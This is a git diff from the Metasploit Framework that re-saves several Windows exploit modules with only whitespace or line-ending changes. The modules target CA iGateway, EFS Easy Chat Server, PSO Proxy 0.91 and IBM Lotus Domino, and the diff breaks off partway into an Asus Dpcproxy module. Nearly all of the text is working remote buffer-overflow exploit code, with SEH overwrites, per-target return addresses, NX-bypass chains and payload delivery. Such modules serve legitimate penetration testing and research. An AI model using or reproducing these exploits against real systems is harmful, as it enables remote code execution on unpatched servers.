index 2a1438b653..e3c14774b0 100644
--- a/modules/exploits/windows/http/ca_igateway_debug.rb
+++ b/modules/exploits/windows/http/ca_igateway_debug.rb
@@ -1,93 +1,93 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-
-
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
-
+
 	include Msf::Exploit::Remote::Tcp
 	include Msf::Exploit::Seh
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'CA iTechnology iGateway Debug Mode Buffer Overflow',
-			'Description'    => %q{
-				This module exploits a vulnerability in the Computer Associates
-				iTechnology iGateway component. When <Debug>True</Debug> is enabled
-				in igateway.conf (non-default), it is possible to overwrite the stack
-				and execute code remotely. This module works best with Ordinal payloads.
-			},
-			'Author'         => 'patrick',
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					[ 'CVE', '2005-3190' ],
-					[ 'OSVDB', '19920' ],
-					[ 'URL', 'http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485' ],
-					[ 'URL', 'http://www.milw0rm.com/exploits/1243' ],
-					[ 'BID', '15025' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'seh',
-				},
-			'Payload'        =>
-				{
-					'Space'    => 1024,
-					'BadChars' => "\x00\x0a\x0d\x20",
-					'StackAdjustment' => -3500,
-					'Compat'   => 
-					{
-						'ConnectionType' => '+ws2ord',
-					},
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'iGateway 3.0.40621.0', { 'Ret' => 0x120bd9c4 } ], # p/p/r xerces-c_2_1_0.dll
-				],
-			'Privileged'     => true,
-			'DisclosureDate' => 'Oct 06 2005',
-			'DefaultTarget'  => 0))
-
-		register_options(
-			[
-				Opt::RPORT(5250),
-			], self.class)
-	end
-
-		def check
-			connect
-			sock.put("HEAD / HTTP/1.0\r\n\r\n\r\n")
-			banner = sock.get(-1,3)
-
-			if (banner =~ /GET and POST methods are the only methods supported at this time/) # Unique?
-				return Exploit::CheckCode::Detected
-			end
-			return Exploit::CheckCode::Safe
-		end
-
-		def exploit
-			connect
-
-			seh = generate_seh_payload(target.ret)
-			buffer = Rex::Text.rand_text_alphanumeric(5000)
-			buffer[1082, seh.length] = seh
-			sploit = "GET /" + buffer + " HTTP/1.0"
-
-			sock.put(sploit + "\r\n\r\n\r\n")
-
-			disconnect
-			handler
-		end
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'CA iTechnology iGateway Debug Mode Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a vulnerability in the Computer Associates
+				iTechnology iGateway component. When <Debug>True</Debug> is enabled
+				in igateway.conf (non-default), it is possible to overwrite the stack
+				and execute code remotely. This module works best with Ordinal payloads.
+			},
+			'Author'         => 'patrick',
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2005-3190' ],
+					[ 'OSVDB', '19920' ],
+					[ 'URL', 'http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485' ],
+					[ 'URL', 'http://www.milw0rm.com/exploits/1243' ],
+					[ 'BID', '15025' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'seh',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 1024,
+					'BadChars' => "\x00\x0a\x0d\x20",
+					'StackAdjustment' => -3500,
+					'Compat'   => 
+					{
+						'ConnectionType' => '+ws2ord',
+					},
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'iGateway 3.0.40621.0', { 'Ret' => 0x120bd9c4 } ], # p/p/r xerces-c_2_1_0.dll
+				],
+			'Privileged'     => true,
+			'DisclosureDate' => 'Oct 06 2005',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				Opt::RPORT(5250),
+			], self.class)
+	end
+
+		def check
+			connect
+			sock.put("HEAD / HTTP/1.0\r\n\r\n\r\n")
+			banner = sock.get(-1,3)
+
+			if (banner =~ /GET and POST methods are the only methods supported at this time/) # Unique?
+				return Exploit::CheckCode::Detected
+			end
+			return Exploit::CheckCode::Safe
+		end
+
+		def exploit
+			connect
+
+			seh = generate_seh_payload(target.ret)
+			buffer = Rex::Text.rand_text_alphanumeric(5000)
+			buffer[1082, seh.length] = seh
+			sploit = "GET /" + buffer + " HTTP/1.0"
+
+			sock.put(sploit + "\r\n\r\n\r\n")
+
+			disconnect
+			handler
+		end
 	end
diff --git a/modules/exploits/windows/http/efs_easychatserver_username.rb b/modules/exploits/windows/http/efs_easychatserver_username.rb
index 142645b1a2..774fd7b578 100644
--- a/modules/exploits/windows/http/efs_easychatserver_username.rb
+++ b/modules/exploits/windows/http/efs_easychatserver_username.rb
@@ -1,90 +1,90 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
-
-	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::Remote::Seh
-
-	def initialize(info = {})
-		super(update_info(info,	
-			'Name'           => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
-			'Description'    => %q{
-				This module exploits a stack overflow in EFS Software Easy Chat Server. By
-				sending a overly long authentication request, an attacker may be able to execute
-				arbitrary code.
-			},
-			'Author'         => [ 'LSO <lso[@]hushmail.com>' ],
-			'License'        => BSD_LICENSE,
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					[ 'CVE', '2004-2466' ],
-					[ 'OSVDB', '7416' ],
-					[ 'BID', '25328' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Privileged'     => true,
-			'Payload'        =>
-				{
-					'Space'    => 500,
-					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
-					'StackAdjustment' => -3500,
-				},
-			'Platform'       => 'win',
-			'Targets'        => 
-				[
-					[ 'Easy Chat Server 2.2', { 'Ret' => 0x1001b2b6 } ], # patrickw OK 20090302 w2k
-				],
-			'DisclosureDate' => 'Aug 14 2007',
-			'DefaultTarget'  => 0))
-			
-			register_options( [ Opt::RPORT(80) ], self.class )
-	end
-
-	def check
-		res = send_request_raw
-			
-			if res and res['Server'] =~ /Easy Chat Server\/1.0/
-				return Exploit::CheckCode::Appears
-			end
-
-			return Exploit::CheckCode::Safe
-	end
-
-	def exploit
-		# randomize some values.
-		val = rand_text_alpha(rand(10) + 1)
-		num = rand_text_numeric(1)
-
-		# exploit buffer.
-		filler = rand_text_alpha(216)
-		seh    = generate_seh_payload(target.ret)
-		juju = filler + seh
-
-		uri = "/chat.ghp?username=#{juju}&password=#{val}&room=2&#{val}=#{num}"
-
-		print_status("Trying target #{target.name}...")
-
-		send_request_raw({'uri' => uri}, 5)
-
-		handler
-		disconnect
-	end
-
-end
-
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::Seh
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack overflow in EFS Software Easy Chat Server. By
+				sending a overly long authentication request, an attacker may be able to execute
+				arbitrary code.
+			},
+			'Author'         => [ 'LSO <lso[@]hushmail.com>' ],
+			'License'        => BSD_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2004-2466' ],
+					[ 'OSVDB', '7416' ],
+					[ 'BID', '25328' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Privileged'     => true,
+			'Payload'        =>
+				{
+					'Space'    => 500,
+					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        => 
+				[
+					[ 'Easy Chat Server 2.2', { 'Ret' => 0x1001b2b6 } ], # patrickw OK 20090302 w2k
+				],
+			'DisclosureDate' => 'Aug 14 2007',
+			'DefaultTarget'  => 0))
+			
+			register_options( [ Opt::RPORT(80) ], self.class )
+	end
+
+	def check
+		res = send_request_raw
+			
+			if res and res['Server'] =~ /Easy Chat Server\/1.0/
+				return Exploit::CheckCode::Appears
+			end
+
+			return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		# randomize some values.
+		val = rand_text_alpha(rand(10) + 1)
+		num = rand_text_numeric(1)
+
+		# exploit buffer.
+		filler = rand_text_alpha(216)
+		seh    = generate_seh_payload(target.ret)
+		juju = filler + seh
+
+		uri = "/chat.ghp?username=#{juju}&password=#{val}&room=2&#{val}=#{num}"
+
+		print_status("Trying target #{target.name}...")
+
+		send_request_raw({'uri' => uri}, 5)
+
+		handler
+		disconnect
+	end
+
+end
+
diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb
index c31429d52f..069d0c15b6 100644
--- a/modules/exploits/windows/http/psoproxy91_overflow.rb
+++ b/modules/exploits/windows/http/psoproxy91_overflow.rb
@@ -1,91 +1,91 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-
-
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
-
+
 	include Msf::Exploit::Remote::Tcp
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'PSO Proxy v0.91 Stack Overflow',
-			'Description'    => %q{
-				This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
-				If a client sends an excessively long string the stack is overwritten.
-			},
-			'Author'         => 'Patrick Webster <patrick@aushack.com>',
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					[ 'CVE', '2004-0313' ],
-					[ 'OSVDB', '4028' ],
-					[ 'URL', 'http://www.milw0rm.com/exploits/156' ],
-					[ 'BID', '9706' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'thread',
-				},
-			'Payload'        =>
-				{
-					'Space'    => 370,
-					'BadChars' => "\x00\x0a\x0d\x20",
-					'StackAdjustment' => -3500,
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-				# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.
-					[ 'Windows 2000 Pro SP0-4 English',  { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll
-					[ 'Windows 2000 Pro SP0-4 French',   { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll
-					[ 'Windows 2000 Pro SP0-4 Italian',  { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll
-					[ 'Windows XP Pro SP0/1 English',    { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll
-					[ 'Windows XP Pro SP2 English',	     { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
-				],
-			'Privileged'     => false,
-			'DisclosureDate' => 'Feb 20 2004',
-			'DefaultTarget'  => 0))
-
-		register_options(
-			[
-				Opt::RPORT(8080),
-			], self.class)
-	end
-
-		def autofilter
-                false
-        end
-
-		def check
-			connect
-			sock.put("GET / HTTP/1.0\r\n\r\n")
-			banner = sock.get(-1,3)
-			if (banner =~ /PSO Proxy 0\.9/)
-				return Exploit::CheckCode::Vulnerable
-			end
-			return Exploit::CheckCode::Safe
-		end
-
-		def exploit
-			connect
-
-			exploit = rand_text_alphanumeric(1024, payload_badchars)
-			exploit += [target['Ret']].pack('V') + payload.encoded
-
-			sock.put(exploit + "\r\n\r\n")
-
-			disconnect
-			handler
-		end
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'PSO Proxy v0.91 Stack Overflow',
+			'Description'    => %q{
+				This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
+				If a client sends an excessively long string the stack is overwritten.
+			},
+			'Author'         => 'Patrick Webster <patrick@aushack.com>',
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2004-0313' ],
+					[ 'OSVDB', '4028' ],
+					[ 'URL', 'http://www.milw0rm.com/exploits/156' ],
+					[ 'BID', '9706' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 370,
+					'BadChars' => "\x00\x0a\x0d\x20",
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+				# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.
+					[ 'Windows 2000 Pro SP0-4 English',  { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll
+					[ 'Windows 2000 Pro SP0-4 French',   { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll
+					[ 'Windows 2000 Pro SP0-4 Italian',  { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll
+					[ 'Windows XP Pro SP0/1 English',    { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll
+					[ 'Windows XP Pro SP2 English',	     { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Feb 20 2004',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				Opt::RPORT(8080),
+			], self.class)
+	end
+
+		def autofilter
+                false
+        end
+
+		def check
+			connect
+			sock.put("GET / HTTP/1.0\r\n\r\n")
+			banner = sock.get(-1,3)
+			if (banner =~ /PSO Proxy 0\.9/)
+				return Exploit::CheckCode::Vulnerable
+			end
+			return Exploit::CheckCode::Safe
+		end
+
+		def exploit
+			connect
+
+			exploit = rand_text_alphanumeric(1024, payload_badchars)
+			exploit += [target['Ret']].pack('V') + payload.encoded
+
+			sock.put(exploit + "\r\n\r\n")
+
+			disconnect
+			handler
+		end
 	end
diff --git a/modules/exploits/windows/lotus/domino_http_accept_language.rb b/modules/exploits/windows/lotus/domino_http_accept_language.rb
index a2bbae9fac..412f972152 100644
--- a/modules/exploits/windows/lotus/domino_http_accept_language.rb
+++ b/modules/exploits/windows/lotus/domino_http_accept_language.rb
@@ -1,161 +1,161 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/projects/Framework/
-##
-
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
-
-	include Msf::Exploit::Remote::HttpClient
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'			=> 'IBM Lotus Domino Web Server Accept-Language Stack Overflow',
-			'Description'		=> %q{
-				This module exploits a stack overflow in IBM Lotus Domino Web Server
-				prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP
-				request with an Accept-Language header greater than 114 bytes.
-			},
-			'Author'		=> [ 'Fairuzan Roslan riaf[at]mysec.org', 'Earl Marcus klks[at]mysec.org' ],
-			'License'		=> MSF_LICENSE,
-			'Version'		=> '$Revision$',
-			'References'		=>
-				[
-					['CVE', '2008-2240'],
-					['OSVDB', '45415'],
-					['BID', '29310'],
-					['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],
-				],
-			'DefaultOptions'	=>
-				{
-					'EXITFUNC'	=> 'thread',
-				},
-			'Privileged'		=> true,
-			'Payload'		=>
-				{
-					'Space'			=> 800, 
-					'BadChars'		=> "\x00\x0a\x20\x2c\x3b",
-					'StackAdjustment'	=> -3500,
-				},
-			'Platform'		=>	'win',
-			'Targets'		=>
-				[
-
-					['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',
-						{
-							'FixESP'	=> 0x70335c79, # add esp, 0x324, ret	 	@fontmanager.dll
-							'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll
-							'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll
-							'Ret'		=> 0x62c838c7, # ret 0x12e			@nlsccstr.dl
-							'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll
-							'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll
-						}
-					],
-
-					['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',
-						{
-							'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll
-							'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll
-							'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll
-							'Ret'		=> 0x62c838c7, # ret 0x12e			@nlsccstr.dll
-							'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll
-							'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll
-						}
-					],
-
-					['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',
-						{
-							'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll
-							'JmpESP'	=> 0x62c6072e, # jmp esp			@lsccstr.dll
-						}
-					],
-
-					['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',
-						{
-							'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
-							'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll
-							'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll
-							'Ret'		=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll
-							'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll
-							'JmpESP'	=> 0x6391071e, # jmp esp 			@nlsccstr.dll
-						}
-					],
-
-					['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',
-						{
-							'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
-							'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll
-							'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll
-							'Ret'		=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll
-							'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll
-							'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll
-						}
-					],
-
-					['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',
-						{
-							'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
-							'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll
-						}
-					],
-
-				],
-			'DisclosureDate' => 'May 20 2008'))
-			
-			register_options( [ Opt::RPORT(80) ], self.class )
-	end
-
-	def exploit
-		connect
-
-		lang = rand_text_alphanumeric(116)				# greetz to hateful chris
-		lang[ 56,  4 ] = [ 0xfffffffe ].pack('V')			# Fix Second crash (esi)
-		lang[ 68,  4 ] = [ 0x7ffaf0ec ].pack('V')			# Fix Second crash (eax) 
-		lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V')			# Fix First crash
-		lang[ 112, 4 ] = [target['FixESP']].pack('V')			# 1 
-		lang << "\x00"
-		lang << payload.encoded
-
-		if(not target['DisableNX'])
-			lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string		# 4
-			lang[ 80,  4 ] = [target['JmpESP']].pack('V')		# 2 
-			lang[ 84,  2 ] = Rex::Arch::X86.jmp_short(-0x46)	# 3 jmp back to top
-		else
-			lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string	# 8
-			lang[ 80,  4 ] = [target['FixESI']].pack('V')		# 2 
-			lang[ 84,  4 ] = [target['FixEBP']].pack('V')		# 3
-			lang[ 88,  4 ] = [target['Ret']].pack('V')		# 4 
-			lang[ 92,  4 ] = [target['JmpESP']].pack('V')		# 6
-			lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56)	# 7  jmp back to top 
-			lang[ 108, 4 ] = [target['DisableNX']].pack('V')	# 5 
-		end
-
-		uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1)	# Trigger
-
-		print_status("Trying target #{target.name}...")
-		send_request_raw({
-						'uri'			=> "#{uri}",
-						'method'		=> 'GET',
-						'headers'		=>
-						{
-							'Accept'		=> '*/*',
-							'Accept-Language'	=> "#{lang}",
-							'Accept-Encoding'	=> 'gzip,deflate',
-							'Keep-Alive'		=> '300',
-							'Connection'		=> 'keep-alive',
-							'User-Agent'		=> 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
-						}
-					}, 5)
-		handler
-		disconnect
-	end
-end
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'			=> 'IBM Lotus Domino Web Server Accept-Language Stack Overflow',
+			'Description'		=> %q{
+				This module exploits a stack overflow in IBM Lotus Domino Web Server
+				prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP
+				request with an Accept-Language header greater than 114 bytes.
+			},
+			'Author'		=> [ 'Fairuzan Roslan riaf[at]mysec.org', 'Earl Marcus klks[at]mysec.org' ],
+			'License'		=> MSF_LICENSE,
+			'Version'		=> '$Revision$',
+			'References'		=>
+				[
+					['CVE', '2008-2240'],
+					['OSVDB', '45415'],
+					['BID', '29310'],
+					['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],
+				],
+			'DefaultOptions'	=>
+				{
+					'EXITFUNC'	=> 'thread',
+				},
+			'Privileged'		=> true,
+			'Payload'		=>
+				{
+					'Space'			=> 800, 
+					'BadChars'		=> "\x00\x0a\x20\x2c\x3b",
+					'StackAdjustment'	=> -3500,
+				},
+			'Platform'		=>	'win',
+			'Targets'		=>
+				[
+
+					['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',
+						{
+							'FixESP'	=> 0x70335c79, # add esp, 0x324, ret	 	@fontmanager.dll
+							'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll
+							'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll
+							'Ret'		=> 0x62c838c7, # ret 0x12e			@nlsccstr.dl
+							'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll
+							'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll
+						}
+					],
+
+					['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',
+						{
+							'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll
+							'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll
+							'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll
+							'Ret'		=> 0x62c838c7, # ret 0x12e			@nlsccstr.dll
+							'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll
+							'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll
+						}
+					],
+
+					['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',
+						{
+							'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll
+							'JmpESP'	=> 0x62c6072e, # jmp esp			@lsccstr.dll
+						}
+					],
+
+					['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',
+						{
+							'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
+							'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll
+							'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll
+							'Ret'		=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll
+							'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll
+							'JmpESP'	=> 0x6391071e, # jmp esp 			@nlsccstr.dll
+						}
+					],
+
+					['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',
+						{
+							'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
+							'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll
+							'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll
+							'Ret'		=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll
+							'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll
+							'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll
+						}
+					],
+
+					['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',
+						{
+							'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll
+							'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll
+						}
+					],
+
+				],
+			'DisclosureDate' => 'May 20 2008'))
+			
+			register_options( [ Opt::RPORT(80) ], self.class )
+	end
+
+	def exploit
+		connect
+
+		lang = rand_text_alphanumeric(116)				# greetz to hateful chris
+		lang[ 56,  4 ] = [ 0xfffffffe ].pack('V')			# Fix Second crash (esi)
+		lang[ 68,  4 ] = [ 0x7ffaf0ec ].pack('V')			# Fix Second crash (eax) 
+		lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V')			# Fix First crash
+		lang[ 112, 4 ] = [target['FixESP']].pack('V')			# 1 
+		lang << "\x00"
+		lang << payload.encoded
+
+		if(not target['DisableNX'])
+			lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string		# 4
+			lang[ 80,  4 ] = [target['JmpESP']].pack('V')		# 2 
+			lang[ 84,  2 ] = Rex::Arch::X86.jmp_short(-0x46)	# 3 jmp back to top
+		else
+			lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string	# 8
+			lang[ 80,  4 ] = [target['FixESI']].pack('V')		# 2 
+			lang[ 84,  4 ] = [target['FixEBP']].pack('V')		# 3
+			lang[ 88,  4 ] = [target['Ret']].pack('V')		# 4 
+			lang[ 92,  4 ] = [target['JmpESP']].pack('V')		# 6
+			lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56)	# 7  jmp back to top 
+			lang[ 108, 4 ] = [target['DisableNX']].pack('V')	# 5 
+		end
+
+		uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1)	# Trigger
+
+		print_status("Trying target #{target.name}...")
+		send_request_raw({
+						'uri'			=> "#{uri}",
+						'method'		=> 'GET',
+						'headers'		=>
+						{
+							'Accept'		=> '*/*',
+							'Accept-Language'	=> "#{lang}",
+							'Accept-Encoding'	=> 'gzip,deflate',
+							'Keep-Alive'		=> '300',
+							'Connection'		=> 'keep-alive',
+							'User-Agent'		=> 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
+						}
+					}, 5)
+		handler
+		disconnect
+	end
+end
diff --git a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb
index f80f93a653..3de2519164 100644
--- a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb
+++ b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb
@@ -1,75 +1,75 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-
-require 'msf/core'
-
-
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
-
+
 	include Msf::Exploit::Remote::Tcp
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Asus Dpcproxy Buffer Overflow',
-			'Description'    => %q{
-					This module exploits a stack overflow in Asus Dpcroxy version 2.0.0.19.
-					It should be vulnerable until version 2.0.0.24.
-					Credit to Luigi Auriemma
-			},
-			'Author'         => 'Jacopo Cervini',
-			'Version'        => '$Revision$',
-			'References'     => 
-				[ 
-					[ 'CVE', '2008-1491' ],
-					[ 'OSVDB', '43638' ],
